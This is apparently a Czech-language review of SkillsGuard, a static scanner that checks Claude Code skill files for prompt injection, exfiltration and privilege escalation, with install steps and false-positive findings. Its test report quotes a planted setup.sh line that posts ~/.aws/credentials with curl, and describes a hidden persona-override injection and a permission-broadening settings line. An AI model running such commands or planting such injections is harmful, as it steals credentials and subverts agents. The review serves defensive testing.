SkillsGuard

Statický skener, který audituje SKILL.md na injekci, exfiltraci a eskalaci

od Teycir · Teycir/SkillsGuard

Funguje s nastavením ★ 6.8/10

SkillsGuard — Statický skener, který audituje SKILL.md na injekci, exfiltraci a eskalaci

Co umí

Spouští statický skener SkillsGuard – 15 kategorií pravidel pokrývajících prompt injection, exfiltraci, command injection, perzistenci, eskalaci privilegií, obfuskaci a dodavatelský řetězec – nad jedním skillem nebo celou složkou skillů, poté formátuje zjištění do verdiktu seskupeného podle závažnosti s doporučením k instalaci / neinstalaci. Před porovnáváním dekóduje base64 a další obfuskované bloby, takže payloady skryté uvnitř kódovaných řetězců jsou hlášeny s dekódovanými důkazy. Spouští se na požadavky jako scan this skill, is this skill safe, nebo audit my skills folder.

Testovací report

Dekódovací engine je skutečná věc: vložil jsem skill, jehož setup.sh skrýval `curl -X POST -d @<(cat ~/.aws/credentials)` uvnitř base64 blobu, a skener jej dekódoval a nahlásil exfiltraci pověření, řádek settings.json rozšiřující oprávnění a injekci persona-override pohřbenou v HTML komentáři — 17 zjištění za 16 ms, všechny tři útoky zachyceny. Přesnost je problém. Při zaměření na skutečnou knihovnu 278 nainstalovaných skillů vygeneroval 15 480 zjištění a celou složku ohodnotil 100/100 CRITICAL, přičemž 204 z 278 skillů označil jako HIGH-nebo-horší; dvě nejhlasitější pravidla odpovídají `rm` a `sh` bez hranic slov, takže jakýkoli markdown inline kód obsahující 'format' nebo 'publish' je hlášen jako command injection. Neškodný 14řádkový skill pro psaní poznámek, jehož jediný backtick byl `--format markdown`, se vrátil jako MEDIUM s pěti HIGH 'command injection' zjištěními. Není ani na npm — samotný SKILL.md nic nedělá, a musíte klonovat, npm install, build a npm link (nebo zapojit MCP server) než skill bude mít co volat. Užitečné jako rychlá předinstalační triáž na jeden podezřelý skill; nevěřte jeho verdiktu na úrovni složky.

Testováno: 2026-08-07 · Claude Code 2.x (agent harness)

Instalace

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Příkazy a ukázkové prompty

  • /skillsguardStatický skener, který audituje SKILL.md na injekci, exfiltraci a eskalaci

Skilly se spouštějí běžnými požadavky — žádné příkazy k zapamatování. Po instalaci ho aktivují prompty jako tyto (anglicky):

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks